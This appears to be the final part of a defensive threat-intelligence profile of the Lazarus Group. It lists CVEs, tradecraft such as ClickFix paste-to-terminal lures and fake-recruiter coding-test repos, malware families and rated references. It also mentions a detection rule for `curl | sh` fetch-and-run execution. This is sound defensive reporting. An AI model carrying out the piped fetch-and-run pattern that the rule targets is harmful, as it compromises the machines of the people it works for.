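The terminal-lineage scoping is what keeps the `curl | sh` rule from firing on CI runners and package managers; on a real fleet, feed it Endpoint Security or EDR process and file events instead of the sample list.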

Technical Evidence

| Type | Value | First Seen | Last Seen | Confidence |
|---|---|---|---|---|
| CVE | CVE-2024-4947 (Chrome zero-day exploited Feb 2025) | 2025-02 | 2025-02 | MODERATE |
| Tradecraft | ClickFix paste-to-terminal lure pattern (macOS) | 2026-04 | 2026-05 | HIGH |
| Tradecraft | Safe{Wallet} dev workstation → AWS session-token theft → UI injection | 2025-02 | 2025-02 | HIGH |
| Tradecraft | Fake recruiter pretexting via LinkedIn/Telegram/Discord with malicious coding-test repos | 2024-01 | 2026-05 | HIGH |
| Malware family | AppleJeus (trojanized crypto-trading apps) | 2018 | 2026 | HIGH |
| Malware family | Mach-O Man macOS loader | 2026-04 | 2026-05 | MODERATE |

[Data Gap: Publicly disclosed atomic IOCs (domains, IPs, file hashes) for 2026 operations lag the operational pace; consume commercial threat-intel feeds for current atomic indicators rather than relying on this profile.]

References

  1. MITRE ATT&CK — Lazarus Group G0032. https://attack.mitre.org/groups/G0032/ · Rating: A1
  2. CISA AA24-207A — North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs (July 2024). https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a · Rating: A1
  3. FBI Press Release — FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony’s Horizon Bridge Currency Theft. https://www.fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft · Rating: A1
  4. CISA — TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies (AA22-108A). https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a · Rating: A1
  5. NCC Group — Bybit Hack: In-Depth Technical Analysis. https://www.nccgroup.com/research/in-depth-technical-analysis-of-the-bybit-hack/ · Rating: B2
  6. TRM Labs — The Bybit Hack: Following North Korea’s Largest Exploit. https://www.trmlabs.com/resources/blog/the-bybit-hack-following-north-koreas-largest-exploit · Rating: B2
  7. The Hacker News — Bybit Hack Traced to Safe{Wallet} Supply Chain Attack (February 2025). https://thehackernews.com/2025/02/bybit-hack-traced-to-safewallet-supply.html · Rating: B2
  8. Picus Security — FBI Confirms North Korean Lazarus Group Behind $1.5 Billion Bybit Crypto Heist. https://www.picussecurity.com/resource/blog/fbi-north-korean-lazarus-group-bybit-crypto-heist · Rating: B2
  9. CoinDesk — Lazarus Group has become especially dangerous with new Mach-O Man attack (April 2026). https://www.coindesk.com/tech/2026/04/22/lazarus-group-has-become-especially-dangerous-with-new-mach-o-man-attack-certik · Rating: B2
  10. UPI — North Korean hackers tied to $290M KelpDAO crypto heist (April 2026). https://www.upi.com/Top_News/World-News/2026/04/22/KelpDAO-LayerZero-North-Korea-crypto-hack-theft-Lazarus-Group/6151776848419/ · Rating: B2
  11. Elliptic — How the Lazarus Group is stepping up crypto hacks and changing its tactics. https://www.elliptic.co/blog/how-the-lazarus-group-is-stepping-up-crypto-hacks-and-changing-its-tactics · Rating: B2
  12. Expel — Inside Lazarus: How North Korea uses AI to industrialize attacks on developers. https://expel.com/blog/inside-lazarus-how-north-korea-uses-ai-to-industrialize-attacks-on-developers/ · Rating: B2
  13. The Register — Lazarus Group targets healthcare orgs with Medusa ransomware (February 2026). https://www.theregister.com/2026/02/24/north_koreas_lazarus_group_healthcare_medusa_ransomware/ · Rating: B2
  14. Picus Security — Lazarus Group (APT38) Explained: Timeline, TTPs, and Major Attacks. https://www.picussecurity.com/resource/blog/lazarus-group-apt38-explained-timeline-ttps-and-major-attacks · Rating: B2
  15. Wilson Center — The Bybit Heist: What Happened & What Now? https://www.wilsoncenter.org/article/bybit-heist-what-happened-what-now · Rating: B2
  16. Security Boulevard — Top Security Incidents of 2025: Lazarus Group’s Cryptocurrency Heist. https://securityboulevard.com/2026/02/top-security-incidents-of-2025-lazarus-groups-cryptocurrency-heist/ · Rating: C3
  17. Chainalysis / 38 North — DPRK cumulative crypto-theft estimates (2019–2025). https://www.38north.org/2026/01/from-digital-kleptocracy-to-rogue-crypto-superpower/ · Rating: C3

Sources & Confidence

Source: PDB Threat Actor Registry · Profile v1

Brandon writes the profiles personally. See /work for the operator background →